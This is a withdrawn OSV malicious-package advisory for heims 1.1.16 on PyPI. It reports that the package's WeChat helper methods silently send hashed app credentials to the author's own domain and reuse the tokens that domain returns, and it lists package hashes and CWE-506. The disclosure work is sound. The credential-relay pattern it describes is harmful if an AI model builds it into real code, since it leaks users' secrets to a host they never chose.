MAL-2026-4754

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/pypi/heims/MAL-2026-4754.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4754
Withdrawn
2026-05-26T22:13:04Z
Published
2026-05-25T05:27:16Z
Modified
2026-05-27T00:32:10.028064555Z
Summary
Malicious code in heims (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (33e7dda6f116113ebe2bd1ae1ec5238d66f8ada8a87e69a90e49aac1f4eb3f57)

The package's WechatUtil.gettoken() in src/heims/utils/wechat/wechatutil.py hardcodes a POST to https://token.zhangjianpeng.cn/ with md5(appid) and md5(appsecret) as query parameters, and uses the accesstoken returned by that third-party host for downstream WeChat API calls. The destination is a personal domain controlled by the author, not WeChat's official api.weixin.qq.com endpoint, and this third-party broker is not disclosed in the README. Multiple advertised methods (gettoken, getphoneinfo, sendtext, getmobileinfo, getqr_code) route through this host, so any caller using WechatUtil delivers hashes of their own WeChat app credentials and the resulting access tokens to the author's server. This is a silent-relay shape: the library's documented WeChat-helper API covertly proxies caller-supplied secrets to a destination the caller did not choose. The behavior fires when the consuming application invokes the WeChat helpers, not at install or import.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.1.16"
            ],
            "sha256": "33e7dda6f116113ebe2bd1ae1ec5238d66f8ada8a87e69a90e49aac1f4eb3f57",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T05:27:16Z",
            "id": "IN-MAL-2026-004584",
            "import_time": "2026-05-26T05:52:53.21472531Z"
        }
    ]
}
References
Credits

Affected packages

PyPI / heims

Package

Affected ranges

Affected versions

1.*
1.1.16

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "heims-1.1.16-py3-none-any.whl",
            "hashes": {
                "sha256": "fb5179563d49c8bdee5f2aa87810e1c5c13606c3320931f9db3ccb3dfbd06e9b",
                "md5": "dd5f26fa99eafc47db35aeee546a5fbf",
                "blake2b_256": "0feb268d8077d510a4feba8c518f9ca078df312732485fed1fef2f85b489a29d"
            }
        },
        {
            "filename": "heims-1.1.16.tar.gz",
            "hashes": {
                "sha256": "89556c2df773eafa1dd5c3440ac3deee64ef505b8087b0b7c364f7450feb3882",
                "md5": "c0bfda4d25643c18295d90648ba3009e",
                "blake2b_256": "33882c03b3e8cda29ba6993c62831e45aa10fddc24b5ef453df8532a5cd3f8c2"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "02aef4ce9ae8ee5e74b1196c077f0e4e890f17950b26671e04afa6729d7d2cc7",
            "path": "src/heims/utils/wechat/wechat_util.py",
            "tlsh": "0f42c917ea136d46d35a48ad21ab870676387c13808c6038bdbd51cc1f8d92ba077feb"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/pypi/heims/MAL-2026-4754.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]